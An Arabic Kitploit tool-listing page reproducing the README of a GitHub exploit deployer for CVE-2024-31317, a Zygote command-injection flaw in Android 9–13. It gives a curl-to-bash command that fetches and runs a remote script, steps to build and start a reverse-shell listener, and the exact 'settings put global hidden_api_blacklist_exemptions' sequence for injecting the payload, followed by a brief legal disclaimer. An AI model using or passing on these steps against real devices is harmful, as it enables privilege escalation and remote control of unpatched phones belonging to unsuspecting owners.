Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-31317-PoC-Deployer — أداة نشر آلية لـ PoC الخاص بـ CVE-2024-31317 على Android 9-13، تتيح تصعيد الامتيازات عبر حقن Zygote وتنفيذ قشرة عكسية. | Kitploit
أدوات/GitHubGitHub/webldix/cve-2024-31317-poc-deployer
أمان أندرويدتصعيد الامتيازاتالاستغلالشيل كوداختبار الاختراقأمن الجوالتطوير الحمولاتاستغلال الملفات الثنائية

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة
GitHub
webldix/cve-2024-31317-poc-deployer

CVE-2024-31317-PoC-Deployer

أداة نشر آلية لـ PoC الخاص بـ CVE-2024-31317 على Android 9-13، تتيح تصعيد الامتيازات عبر حقن Zygote وتنفيذ قشرة عكسية.

عرض المستودع
52889منذ سنة واحدةتمت المراجعة من قبل Kitploit

CVE-2024-31317-PoC-Deployer

Android Version Patch Level License

أداة نشر لاستغلال إثبات المفهوم (PoC) الخاص بثغرة CVE-2024-31317، وتستهدف أجهزة Android 9 حتى 13.

📝 وصف المشروع

CVE-2024-31317-PoC-Deployer هو سكربت نشر آلي لإنشاء وتكوين جميع الملفات المطلوبة لاستغلال ثغرة CVE-2024-31317 بسرعة. تؤثر هذه الثغرة على أجهزة Android 9 حتى 13، وتتيح تصعيد الامتيازات وتنفيذ تعليمات برمجية عشوائية عبر عملية Zygote.

🚨 معلومات الثغرة

  • CVE ID: CVE-2024-31317
  • نطاق التأثير: من Android 9 إلى Android 13
  • الإصدار المُصحَّح: إصدارات Android بمستوى تصحيح يونيو 2024 وما بعده
  • نوع الثغرة: حقن أوامر في عملية Zygote
  • الصلاحيات المطلوبة: WRITE_SECURE_SETTINGS

📦 الملفات المضمنة

  • reverse_shell.c - برنامج شل عكسي مطبَّق بلغة C
  • payload.txt - الحمولة (payload) المصممة خصيصاً لاستغلال الثغرة
  • compile.sh - سكربت تجميع تلقائي
  • README.txt - تعليمات استخدام مفصلة
  • CVE-2024-31317.txt - وثيقة التحليل الفني للثغرة

🛠️ البدء السريع

  1. تشغيل سكربت النشر عن بُعد:

    pkg install -y curl ; bash -c "$(curl -L https://ghfast.top/https://github.com/Webldix/CVE-2024-31317-PoC-Deployer/blob/main/Android_Zygote_Research_Kit.sh)"
    
  2. تجميع الشل العكسي:

    sh compile.sh
    
  3. تشغيل مستمع الشل العكسي:

    sh reverse_shell
    

💣 خطوات الاستغلال

  1. ارفع payload.txt إلى المسار /data/local/tmp/ على الجهاز الهدف
  2. استبدل xxx.xxx.xxx داخل payload.txt بعنوان IP الخاص بخادم الاستماع لديك
  3. نفّذ تسلسل الأوامر التالي على الجهاز الهدف:
    am force-stop com.android.settings
    cd /data/local/tmp/
    settings put global hidden_api_blacklist_exemptions "$(cat payload.txt)"
    am start -n com.android.settings/.Settings
    settings put global hidden_api_blacklist_exemptions "null"
    

⚠️ إخلاء المسؤولية

هذه الأداة مخصّصة لأغراض الاختبارات الأمنية والبحث المشروعة فقط. يجب الحصول على إذن صريح من النظام الهدف قبل الاستخدام. قد يُعدّ الاستخدام غير المصرح به انتهاكاً للقانون. لا يتحمّل المطوّر أي مسؤولية عن أي إساءة استخدام.

📜 الترخيص

هذا المشروع مرخّص بموجب رخصة MIT - راجع ملف LICENSE لمزيد من التفاصيل.

📚 المراجع التقنية

  • Android Security Bulletin - June 2024
  • CVE-2024-31317 Details
تنزيل الأداة